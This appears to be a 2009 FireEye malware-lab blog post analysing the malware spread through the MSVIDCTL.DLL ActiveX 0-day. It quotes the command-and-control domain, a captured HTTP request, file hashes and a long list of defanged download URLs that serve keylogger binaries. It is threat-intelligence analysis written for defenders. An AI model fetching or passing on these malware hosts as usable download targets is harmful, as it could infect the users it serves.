Blog

Who is Exploiting the Windows 0-day (MSVIDCTL.DLL) ?

As most readers will already know, a new 0-day vulnerability in MS Video ActiveX Control is currently being exploited in the wild.  Lots of research material has already been published covering different aspects of this vulnerability and the attack vector.  I have nothing more to add on this front.  I would rather focus on explaining the details of the malware behind the scenes.

Readers who are interested in learning more about the vulnerability might refer to these articles:

http://voices.washingtonpost.com/securityfix/2009/07/microsoft_internet_explorer_ex.html
http://isc.sans.org/diary.html?storyid=6733
http://www.csis.dk/dk/nyheder/nyheder.asp?tekstID=799

Surprisingly, no detailed analysis of the underlying malware is yet available on the web (at least I was not able to find it). The primary purpose of this article is to bridge this gap.

Let's just start here.

MD5 = 6cf94b87cbeabfa0cec421f3e4827823

Packing  = NsPack

AV Coverage (Virus Total) = 95.12 %

Although the vulnerability is 0-day, the malware itself has been around for quite some time.  Upon execution this malware tries to contact its CnC server 'babi2009.com'. Here is what the first HTTP request looks like:

GET /360/aa1dfh.txt HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: babi2009.com
Connection: Keep-Alive

The purpose of this HTTP GET request is to download a list of additional malware.

1:hxxp://haha888l.com/xiao/aa1.exe
1:hxxp://haha888l.com/xiao/aa2.exe
1:hxxp://haha888l.com/xiao/aa3.exe
1:hxxp://haha888l.com/xiao/aa4.exe
1:hxxp://haha888l.com/xiao/aa5.exe
1:hxxp://haha888l.com/xiao/aa6.exe
1:hxxp://haha888l.com/xiao/aa7.exe
1:hxxp://haha888l.com/xiao/aa8.exe
1:hxxp://haha888l.com/xiao/aa9.exe
1:hxxp://haha888l.com/xiao/aa10.exe
1:hxxp://haha999b.com/xiao/aa11.exe
1:hxxp://haha999b.com/xiao/aa12.exe
1:hxxp://haha999b.com/xiao/aa13.exe
1:hxxp://haha999b.com/xiao/aa14.exe
1:hxxp://haha999b.com/xiao/aa15.exe
1:hxxp://haha999b.com/xiao/aa16.exe

1:hxxp://haha999b.com/xiao/aa17.exe
1:hxxp://haha999b.com/xiao/aa18.exe
1:hxxp://haha999b.com/xiao/aa19.exe
1:hxxp://haha999b.com/xiao/aa20.exe
1:hxxp://haha999b.com/xiao/aa21.exe
1:hxxp://haha999b.com/xiao/aa22.exe
1:hxxp://haha999b.com/xiao/aa23.exe
1:hxxp://haha999b.com/xiao/aa24.exe
1:hxxp://haha999b.com/xiao/aa25.exe
1:hxxp://haha999b.com/xiao/aa26.exe
1:hxxp://haha999b.com/xiao/aa27.exe
1:hxxp://haha999b.com/xiao/aa28.exe
1:hxxp://haha999b.com/xiao/aa29.exe
1:hxxp://haha999b.com/xiao/aa30.exe
1:hxxp://haha999b.com/xiao/aa31.exe
1:hxxp://haha999b.com/xiao/aa32.exe
1:hxxp://haha999b.com/xiao/aa33.exe
1:hxxp://haha999b.com/xiao/aa34.exe
1:hxxp://haha999b.com/xiao/aa35.exe
1:hxxp://haha999b.com/xiao/aa36.exe
1:hxxp://haha999b.com/xiao/1.exe

One can see that there are lots of exes mentioned in the above list which are starting with aa**.exe. Although all these binaries have different MD5s, underneath there it is single piece of code, a keylogger.

A Threat Expert analysis for this key logger can be found here.

The only binary which is different from the rest is the last one 1.exe (B6941043CA9FA2E589C4B4BCE275C6D0). The outbound communication for this child download looks like this:

1

Definitely the above mentioned malware is just one instance currently exploiting this vulnerability. In the coming days we will see more malware being paired up with this exploit. Things will continue to get worse until Microsoft comes up with a patch.  We've already seen a huge spike of this malware infection through our Malware Analysis & Exchange (MAX) Network since the exploit was made public.

There are many details which I am leaving out for today, and I hope to come up with more in next few days.

Atif Mushtaq @ FireEye Malware Intelligence Lab

Question/Comments : research SHIFT-2 fireeye DOT COM

2 thoughts on “Who is Exploiting the Windows 0-day (MSVIDCTL.DLL) ?

  1. the typical problems are unsupported hardware drivers and software that needs admin level access to run. Both of these are security measures added to Vista and things that the *nix community have faulted Microsoft for a lot in past.

  2. As most readers will already know, a new 0-day vulnerability in MS Video ActiveX Control is currently being exploited in the wild. Lots of research material has already been published covering different aspects of this vulnerability and the attack vector. I have nothing more to add on this front. I would rather focus on explaining the details of the malware behind the scenes.

Comments are closed.